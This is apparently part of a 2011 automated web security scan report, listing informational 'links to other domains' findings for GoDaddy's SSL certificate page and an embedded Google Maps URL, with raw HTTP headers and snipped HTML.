               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<div style="width: 100%; text-align: center; margin-top: 5px;"><img src="http://imagesak.securepaynet.net/aaa/hosting/1/img_fav.gif" border="0" width="234" height="76" title="" /></div></td>
               <td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('http://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="http://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<div align="left"><img src="http://imagesak.securepaynet.net/aaa/common/1/img_specials.gif" border="0" width="110" height="17" alt="Domain Specials"><br>
...[SNIP]...
<a href="javascript: openFrag1('74');" onclick="FastballEvent_MouseClick(event, '9653', this, 'c74', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_plus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<a href="javascript: closeFrag1('74');" onclick="FastballEvent_MouseClick(event, '9657', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_minus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<td width="452" colspan="2" class="headingTextInverted" style="text-align:left;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="452" height="1"><br />
...[SNIP]...
<td width="40"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="40" height="1"></td>
           <td width="452" valign="top" colspan="2"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="352" height="3"><br>
...[SNIP]...
<a href="javascript: toggleFrag('74');" onclick="FastballEvent_MouseClick(event, document.frmCrossSell.i_ci_74.value, this, document.frmCrossSell.id_74.value, 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/31217_qsc_animated.gif" border="0"></a>
...[SNIP]...
<a href="javascript: openFrag1('74');" onclick="FastballEvent_MouseClick(event, '9654', this, 'c74', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: openFrag1('74');" onclick="FastballEvent_MouseClick(event, '9655', this, 'c74', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_plus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<a href="javascript: closeFrag1('74');" onclick="FastballEvent_MouseClick(event, '9658', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: closeFrag1('74');" onclick="FastballEvent_MouseClick(event, '9659', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_minus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<span name="aa2" id="Span1"><img src="http://imagesak.securepaynet.net/aaa/offers/img_fixed.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<td width="452" colspan="2" class="headingTextInverted" style="text-align:left;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="452" height="1"><br />
...[SNIP]...
<td width="40"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="40" height="1"></td>
           <td width="452" valign="top" colspan="2"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="352" height="3"><br>
...[SNIP]...
<td width="84" align="center" valign="top" style="padding: 4px 0px 4px 4px;" nowrap><img src="http://imagesak.securepaynet.net/aaa/offers/15564_tb.gif" border="0"></td>
...[SNIP]...
<span name="aa150" id="Span1"><img src="http://imagesak.securepaynet.net/aaa/offers/img_fixed.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<td width="452" colspan="2" class="headingTextInverted" style="text-align:left;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="452" height="1"><br />
...[SNIP]...
<td width="40"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="40" height="1"></td>
           <td width="452" valign="top" colspan="2"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="352" height="3"><br>
...[SNIP]...
<a href="javascript: toggleFrag('150');" onclick="FastballEvent_MouseClick(event, document.frmCrossSell.i_ci_150.value, this, document.frmCrossSell.id_150.value, 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/icn_dns_xsell.png" border="0"></a>
...[SNIP]...
<a href="javascript: openFrag1('15');" onclick="FastballEvent_MouseClick(event, '9773', this, 'c15', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_plus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<a href="javascript: closeFrag1('15');" onclick="FastballEvent_MouseClick(event, '9777', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_minus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<td width="452" colspan="2" class="headingTextInverted" style="text-align:left;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="452" height="1"><br />
...[SNIP]...
<td width="40"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="40" height="1"></td>
           <td width="452" valign="top" colspan="2"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="352" height="3"><br>
...[SNIP]...
<a href="javascript: toggleFrag('15');" onclick="FastballEvent_MouseClick(event, document.frmCrossSell.i_ci_15.value, this, document.frmCrossSell.id_15.value, 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/15564_wst.gif" border="0"></a>
...[SNIP]...
<a href="javascript: openFrag1('15');" onclick="FastballEvent_MouseClick(event, '9774', this, 'c15', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: openFrag1('15');" onclick="FastballEvent_MouseClick(event, '9775', this, 'c15', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_plus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<a href="javascript: closeFrag1('15');" onclick="FastballEvent_MouseClick(event, '9778', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: closeFrag1('15');" onclick="FastballEvent_MouseClick(event, '9779', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_minus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<a href="javascript: openFrag1('73');" onclick="FastballEvent_MouseClick(event, '9701', this, 'c73', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_plus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<a href="javascript: closeFrag1('73');" onclick="FastballEvent_MouseClick(event, '9705', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/img_minus.gif" border="0" width="34" height="27"></a>
...[SNIP]...
<td width="452" colspan="2" class="headingTextInverted" style="text-align:left;"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="452" height="1"><br />
...[SNIP]...
<td width="40"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="40" height="1"></td>
           <td width="452" valign="top" colspan="2"><img src="http://imagesak.securepaynet.net/assets/spc_trans.gif" width="352" height="3"><br>
...[SNIP]...
<a href="javascript: toggleFrag('73');" onclick="FastballEvent_MouseClick(event, document.frmCrossSell.i_ci_73.value, this, document.frmCrossSell.id_73.value, 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/15564_mail.gif" border="0"></a>
...[SNIP]...
<a href="javascript: openFrag1('73');" onclick="FastballEvent_MouseClick(event, '9702', this, 'c73', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: openFrag1('73');" onclick="FastballEvent_MouseClick(event, '9703', this, 'c73', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_plus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<a href="javascript: closeFrag1('73');" onclick="FastballEvent_MouseClick(event, '9706', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/1/img_drkarrows.gif" border="0" width="12" height="11" hspace="6"></a>
...[SNIP]...
<a href="javascript: closeFrag1('73');" onclick="FastballEvent_MouseClick(event, '9707', this, '', 'a');"><img src="http://imagesak.securepaynet.net/aaa/offers/bul_minus.gif" border="0" width="10" height="10" valign="absmiddle"></a>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...
</b> or cause that you believe Go Daddy should
support, visit <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;">GoDaddyCares.com</a>
...[SNIP]...

17.39. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=427803&t=2
http://img1.wsimg.com/assets/godaddy.ico
http://img1.wsimg.com/fos/img/ssl_screen_prem.gif
http://img1.wsimg.com/fos/img/ssl_screen_standard.gif
http://img1.wsimg.com/fos/logo/1/61169_img_scmag.jpg
http://img1.wsimg.com/fos/pdf/SGC_WhyDontNeedSGC.pdf?ci=37129
http://img1.wsimg.com/fos/pdf/SSL_WhybuyGDSSL.pdf?ci=37128
http://img1.wsimg.com/fos/pdf/Why-you-need-SSL_GD_v2.pdf?ci=37127
http://img2.wsimg.com/fos/css/1/sales_http_20110711.css
http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css
http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2
http://img3.wsimg.com/fos/script/atlantis_jquery7.min.js
http://img3.wsimg.com/fos/script/sales16.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
http://www.bobparsons.me/index.php?id=-1
http://www.godaddycares.com/
https://email.secureserver.net/
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:28:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wgegihwbqjtcqjfhsblalayejedfpbid; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 133386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/fos/css/1/sales_http_20110711.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" />

<link rel="canonical" href="http://www.godaddy.com/ssl/ssl-certificates.aspx"/>
...[SNIP]...
n, 128-bit encryption, high grade 256-bit encryption, certification authority, certificate authority, internet security, PKI, public key infrastructure, Go Daddy.com, Go Daddy, godaddy.com, godaddy" /><link rel="shortcut icon" href="http://img1.wsimg.com/assets/godaddy.ico" /><meta property="og:title" content="GoDaddy.com SSL Certificates">
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<li title="Bob Parsons Blog" onclick="pcj_lnkPop('http://www.bobparsons.me/index.php?ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1">Bob's Video Blog</a>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<div style="padding-left: 30px;">
<img src="http://img1.wsimg.com/fos/logo/1/61169_img_scmag.jpg" alt="" width="152" height="68" onmouseover="atl_ShowQuickHelp(event,'scawards2011_ssl', true);" onmouseout="atl_HideQuickHelp();" />
</div>
...[SNIP]...
<div class="tcenter">
<img src="http://img1.wsimg.com/fos/img/ssl_screen_standard.gif" alt="" />
</div>
...[SNIP]...
<div class="tcenter">
<img src="http://img1.wsimg.com/fos/img/ssl_screen_prem.gif" alt="" />
</div>
...[SNIP]...
</span> <a class="c70" target="_about" href="http://img1.wsimg.com/fos/pdf/Why-you-need-SSL_GD_v2.pdf?ci=37127">
Why you need an SSL</a>
...[SNIP]...
</span> <a class="c70" target="_about" href="http://img1.wsimg.com/fos/pdf/SSL_WhybuyGDSSL.pdf?ci=37128">
Why buy a
Go Daddy
SSL?</a>
...[SNIP]...
</span> <a class="c70" target="_about" href="http://img1.wsimg.com/fos/pdf/SGC_WhyDontNeedSGC.pdf?ci=37129">
Why you don't need an SGC</a>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...
</b> or cause that you believe Go Daddy should
support, visit <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;">GoDaddyCares.com</a>
...[SNIP]...
</div>

<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"></script>
...[SNIP]...
<img src="http://ads.bluelithium.com/pixel?id=427803&t=2" width="1" height="1" />

<script src="http://img3.wsimg.com/fos/script/atlantis_jquery7.min.js" type="text/javascript"></script>
...[SNIP]...

17.40. http://www.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1+Memorial+Drive,+Cambridge,+MA&sll=37.0625,-95.677068&sspn=36.726391,77.607422&ie=UTF8&hq=&hnear=1+Memorial+Dr,+Cambridge,+Middlesex,+Massachusetts+02142&ll=42.361406,-71.081282&spn=0.008372,0.018947&z=14&output=embed

The response contains the following links to other domains:

http://maps.gstatic.com/favicon.ico
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/poweredby.png
http://maps.gstatic.com/mapfiles/smc.png
http://maps.gstatic.com/mapfiles/transparent.png

Request

GET /maps?f=q&source=s_q&hl=en&geocode=&q=1+Memorial+Drive,+Cambridge,+MA&sll=37.0625,-95.677068&sspn=36.726391,77.607422&ie=UTF8&hq=&hnear=1+Memorial+Dr,+Cambridge,+Middlesex,+Massachusetts+02142&ll=42.361406,-71.081282&spn=0.008372,0.018947&z=14&output=embed HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://geom2.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=aYJjaoJUNshldk3FUs-vgsnQPJuDrjBt3LzHNFQ3N3bLmMufnkOZ7iX2MROGgKXHYJfo8-7QDL4Tqk2kAaYx2lrsnOlscEXcdgi_FMD_BsfBB0Tnyn77h3FbX1c9opy9

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Sat, 03 Sep 2011 13:15:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
Content-Length: 166295
X-XSS-Protection: 1; mode=block

